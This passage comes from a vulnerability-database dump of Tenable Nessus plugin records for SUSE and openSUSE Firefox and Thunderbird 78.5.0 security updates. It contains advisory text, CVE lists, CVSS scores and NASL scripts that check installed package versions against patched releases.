script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-branding-upstream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-buildsymbols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"MozillaFirefox-78.5.0-lp151.2.79.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"MozillaFirefox-branding-upstream-78.5.0-lp151.2.79.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"MozillaFirefox-buildsymbols-78.5.0-lp151.2.79.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"MozillaFirefox-debuginfo-78.5.0-lp151.2.79.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"MozillaFirefox-debugsource-78.5.0-lp151.2.79.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"MozillaFirefox-devel-78.5.0-lp151.2.79.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"MozillaFirefox-translations-common-78.5.0-lp151.2.79.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"MozillaFirefox-translations-other-78.5.0-lp151.2.79.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaFirefox / MozillaFirefox-branding-upstream / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-21T14:42:33", "description": "This update for MozillaThunderbird fixes the following issues :\n\nTODO\n\n - Mozilla Thunderbird 78.5.0\n\n - new: OpenPGP: Added option to disable attaching the public key to a signed message (bmo#1654950)\n\n - new: MailExtensions: 'compose_attachments' context added to Menus API (bmo#1670822)\n\n - new: MailExtensions: Menus API now available on displayed messages (bmo#1670825)\n\n - changed: MailExtensions: browser.tabs.create will now wait for 'mail-delayed-startup-finished' event (bmo#1674407)\n\n - fixed: OpenPGP: Support for inline PGP messages improved (bmo#1672851)\n\n - fixed: OpenPGP: Message security dialog showed unverified keys as unavailable (bmo#1675285)\n\n - fixed: Chat: New chat contact menu item did not function (bmo#1663321)\n\n - fixed: Various theme and usability improvements (bmo#1673861)\n\n - fixed: Various security fixes MFSA 2020-52 (bsc#1178894)\n\n - CVE-2020-26951 (bmo#1667113) Parsing mismatches could confuse and bypass security sanitizer for chrome privileged code\n\n - CVE-2020-16012 (bmo#1642028) Variable time processing of cross-origin images during drawImage calls\n\n - CVE-2020-26953 (bmo#1656741) Fullscreen could be enabled without displaying the security UI\n\n - CVE-2020-26956 (bmo#1666300) XSS through paste (manual and clipboard API)\n\n - CVE-2020-26958 (bmo#1669355) Requests intercepted through ServiceWorkers lacked MIME type restrictions\n\n - CVE-2020-26959 (bmo#1669466) Use-after-free in WebRequestService\n\n - CVE-2020-26960 (bmo#1670358) Potential use-after-free in uses of nsTArray\n\n - CVE-2020-15999 (bmo#1672223) Heap buffer overflow in freetype\n\n - CVE-2020-26961 (bmo#1672528) DoH did not filter IPv4 mapped IP Addresses\n\n - CVE-2020-26965 (bmo#1661617) Software keyboards may have remembered typed passwords\n\n - CVE-2020-26966 (bmo#1663571) Single-word search queries were also broadcast to local network\n\n - CVE-2020-26968 (bmo#1551615, bmo#1607762, bmo#1656697, bmo#1657739, bmo#1660236, bmo#1667912, bmo#1671479, bmo#1671923) Memory safety bugs fixed in Thunderbird 78.5\n\n - Mozilla Thunderbird 78.4.3 \n\n - fixed: User interface was inconsistent when switching from the default theme to the dark theme and back to the default theme (bmo#1659282)\n\n - fixed: Email subject would disappear when hovering over it with the mouse when using Windows 7 Classic theme (bmo#1675970)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-12-08T00:00:00", "type": "nessus", "title": "openSUSE Security Update : MozillaThunderbird (openSUSE-2020-2187)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999", "CVE-2020-16012", "CVE-2020-26951", "CVE-2020-26953", "CVE-2020-26956", "CVE-2020-26958", "CVE-2020-26959", "CVE-2020-26960", "CVE-2020-26961", "CVE-2020-26965", "CVE-2020-26966", "CVE-2020-26968"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:MozillaThunderbird", "p-cpe:/a:novell:opensuse:MozillaThunderbird-debuginfo", "p-cpe:/a:novell:opensuse:MozillaThunderbird-debugsource", "p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-common", "p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-other", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2020-2187.NASL", "href": "https://www.tenable.com/plugins/nessus/143540", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-2187.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143540);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-15999\",\n \"CVE-2020-16012\",\n \"CVE-2020-26951\",\n \"CVE-2020-26953\",\n \"CVE-2020-26956\",\n \"CVE-2020-26958\",\n \"CVE-2020-26959\",\n \"CVE-2020-26960\",\n \"CVE-2020-26961\",\n \"CVE-2020-26965\",\n \"CVE-2020-26966\",\n \"CVE-2020-26968\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"openSUSE Security Update : MozillaThunderbird (openSUSE-2020-2187)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for MozillaThunderbird fixes the following issues :\n\nTODO\n\n - Mozilla Thunderbird 78.5.0\n\n - new: OpenPGP: Added option to disable attaching the\n public key to a signed message (bmo#1654950)\n\n - new: MailExtensions: 'compose_attachments' context added\n to Menus API (bmo#1670822)\n\n - new: MailExtensions: Menus API now available on\n displayed messages (bmo#1670825)\n\n - changed: MailExtensions: browser.tabs.create will now\n wait for 'mail-delayed-startup-finished' event\n (bmo#1674407)\n\n - fixed: OpenPGP: Support for inline PGP messages improved\n (bmo#1672851)\n\n - fixed: OpenPGP: Message security dialog showed\n unverified keys as unavailable (bmo#1675285)\n\n - fixed: Chat: New chat contact menu item did not function\n (bmo#1663321)\n\n - fixed: Various theme and usability improvements\n (bmo#1673861)\n\n - fixed: Various security fixes MFSA 2020-52 (bsc#1178894)\n\n - CVE-2020-26951 (bmo#1667113) Parsing mismatches could\n confuse and bypass security sanitizer for chrome\n privileged code\n\n - CVE-2020-16012 (bmo#1642028) Variable time processing of\n cross-origin images during drawImage calls\n\n - CVE-2020-26953 (bmo#1656741) Fullscreen could be enabled\n without displaying the security UI\n\n - CVE-2020-26956 (bmo#1666300) XSS through paste (manual\n and clipboard API)\n\n - CVE-2020-26958 (bmo#1669355) Requests intercepted\n through ServiceWorkers lacked MIME type restrictions\n\n - CVE-2020-26959 (bmo#1669466) Use-after-free in\n WebRequestService\n\n - CVE-2020-26960 (bmo#1670358) Potential use-after-free in\n uses of nsTArray\n\n - CVE-2020-15999 (bmo#1672223) Heap buffer overflow in\n freetype\n\n - CVE-2020-26961 (bmo#1672528) DoH did not filter IPv4\n mapped IP Addresses\n\n - CVE-2020-26965 (bmo#1661617) Software keyboards may have\n remembered typed passwords\n\n - CVE-2020-26966 (bmo#1663571) Single-word search queries\n were also broadcast to local network\n\n - CVE-2020-26968 (bmo#1551615, bmo#1607762, bmo#1656697,\n bmo#1657739, bmo#1660236, bmo#1667912, bmo#1671479,\n bmo#1671923) Memory safety bugs fixed in Thunderbird\n 78.5\n\n - Mozilla Thunderbird 78.4.3 \n\n - fixed: User interface was inconsistent when switching\n from the default theme to the dark theme and back to the\n default theme (bmo#1659282)\n\n - fixed: Email subject would disappear when hovering over\n it with the mouse when using Windows 7 Classic theme\n (bmo#1675970)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1178894\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected MozillaThunderbird packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-26968\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"MozillaThunderbird-78.5.0-lp151.2.59.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"MozillaThunderbird-debuginfo-78.5.0-lp151.2.59.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"MozillaThunderbird-debugsource-78.5.0-lp151.2.59.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"MozillaThunderbird-translations-common-78.5.0-lp151.2.59.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"MozillaThunderbird-translations-other-78.5.0-lp151.2.59.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaThunderbird / MozillaThunderbird-debuginfo / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-21T14:43:28", "description": "This update for MozillaFirefox fixes the following issues :\n\nFirefox Extended Support Release 78.5.0 ESR (bsc#1178824)\n\n - CVE-2020-26951: Parsing mismatches could confuse and bypass security sanitizer for chrome privileged code\n\n - CVE-2020-16012: Variable time processing of cross-origin images during drawImage calls\n\n - CVE-2020-26953: Fullscreen could be enabled without displaying the security UI\n\n - CVE-2020-26956: XSS through paste (manual and clipboard API)\n\n - CVE-2020-26958: Requests intercepted through ServiceWorkers lacked MIME type restrictions\n\n - CVE-2020-26959: Use-after-free in WebRequestService\n\n - CVE-2020-26960: Potential use-after-free in uses of nsTArray\n\n - CVE-2020-15999: Heap buffer overflow in freetype\n\n - CVE-2020-26961: DoH did not filter IPv4 mapped IP Addresses\n\n - CVE-2020-26965: Software keyboards may have remembered typed passwords\n\n - CVE-2020-26966: Single-word search queries were also broadcast to local network\n\n - CVE-2020-26968: Memory safety bugs fixed in Firefox 83 and Firefox ESR 78.5\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : MozillaFirefox (SUSE-SU-2020:3548-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999", "CVE-2020-16012", "CVE-2020-26951", "CVE-2020-26953", "CVE-2020-26956", "CVE-2020-26958", "CVE-2020-26959", "CVE-2020-26960", "CVE-2020-26961", "CVE-2020-26965", "CVE-2020-26966", "CVE-2020-26968"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:MozillaFirefox", "p-cpe:/a:novell:suse_linux:MozillaFirefox-debuginfo", "p-cpe:/a:novell:suse_linux:MozillaFirefox-debugsource", "p-cpe:/a:novell:suse_linux:MozillaFirefox-devel", "p-cpe:/a:novell:suse_linux:MozillaFirefox-translations-common", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2020-3548-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143741", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:3548-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143741);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-15999\",\n \"CVE-2020-16012\",\n \"CVE-2020-26951\",\n \"CVE-2020-26953\",\n \"CVE-2020-26956\",\n \"CVE-2020-26958\",\n \"CVE-2020-26959\",\n \"CVE-2020-26960\",\n \"CVE-2020-26961\",\n \"CVE-2020-26965\",\n \"CVE-2020-26966\",\n \"CVE-2020-26968\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"SUSE SLES12 Security Update : MozillaFirefox (SUSE-SU-2020:3548-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for MozillaFirefox fixes the following issues :\n\nFirefox Extended Support Release 78.5.0 ESR (bsc#1178824)\n\n - CVE-2020-26951: Parsing mismatches could confuse and\n bypass security sanitizer for chrome privileged code\n\n - CVE-2020-16012: Variable time processing of cross-origin\n images during drawImage calls\n\n - CVE-2020-26953: Fullscreen could be enabled without\n displaying the security UI\n\n - CVE-2020-26956: XSS through paste (manual and clipboard\n API)\n\n - CVE-2020-26958: Requests intercepted through\n ServiceWorkers lacked MIME type restrictions\n\n - CVE-2020-26959: Use-after-free in WebRequestService\n\n - CVE-2020-26960: Potential use-after-free in uses of\n nsTArray\n\n - CVE-2020-15999: Heap buffer overflow in freetype\n\n - CVE-2020-26961: DoH did not filter IPv4 mapped IP\n Addresses\n\n - CVE-2020-26965: Software keyboards may have remembered\n typed passwords\n\n - CVE-2020-26966: Single-word search queries were also\n broadcast to local network\n\n - CVE-2020-26968: Memory safety bugs fixed in Firefox 83\n and Firefox ESR 78.5\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1178824\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-15999/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-16012/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26951/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26953/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26956/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26958/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26959/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26960/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26961/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26965/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26966/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26968/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20203548-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4dd2a5f3\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud Crowbar 9 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-9-2020-3548=1\n\nSUSE OpenStack Cloud Crowbar 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-8-2020-3548=1\n\nSUSE OpenStack Cloud 9 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-9-2020-3548=1\n\nSUSE OpenStack Cloud 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-8-2020-3548=1\n\nSUSE OpenStack Cloud 7 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-7-2020-3548=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP5-2020-3548=1\n\nSUSE Linux Enterprise Server for SAP 12-SP4 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP4-2020-3548=1\n\nSUSE Linux Enterprise Server for SAP 12-SP3 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP3-2020-3548=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP2-2020-3548=1\n\nSUSE Linux Enterprise Server 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP5-2020-3548=1\n\nSUSE Linux Enterprise Server 12-SP4-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP4-LTSS-2020-3548=1\n\nSUSE Linux Enterprise Server 12-SP3-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-2020-3548=1\n\nSUSE Linux Enterprise Server 12-SP3-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-BCL-2020-3548=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-2020-3548=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2020-3548=1\n\nSUSE Enterprise Storage 5 :\n\nzypper in -t patch SUSE-Storage-5-2020-3548=1\n\nHPE Helion Openstack 8 :\n\nzypper in -t patch HPE-Helion-OpenStack-8-2020-3548=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-26968\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3|4|5)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3/4/5\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"MozillaFirefox-78.5.0-112.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"MozillaFirefox-debuginfo-78.5.0-112.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"MozillaFirefox-debugsource-78.5.0-112.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"MozillaFirefox-devel-78.5.0-112.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"MozillaFirefox-translations-common-78.5.0-112.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"MozillaFirefox-78.5.0-112.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"MozillaFirefox-debuginfo-78.5.0-112.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"MozillaFirefox-debugsource-78.5.0-112.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"MozillaFirefox-devel-78.5.0-112.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"MozillaFirefox-translations-common-78.5.0-112.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"MozillaFirefox-78.5.0-112.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"MozillaFirefox-debuginfo-78.5.0-112.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"MozillaFirefox-debugsource-78.5.0-112.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"MozillaFirefox-devel-78.5.0-112.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"MozillaFirefox-translations-common-78.5.0-112.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"MozillaFirefox-78.5.0-112.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"MozillaFirefox-debuginfo-78.5.0-112.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"MozillaFirefox-debugsource-78.5.0-112.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"MozillaFirefox-devel-78.5.0-112.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"MozillaFirefox-translations-common-78.5.0-112.36.1\")) flag++;\n\n\nif (flag)\n{\n set_kb_item(name:'www/0/XSS', value:TRUE);\n if (report_verbosity > 0) 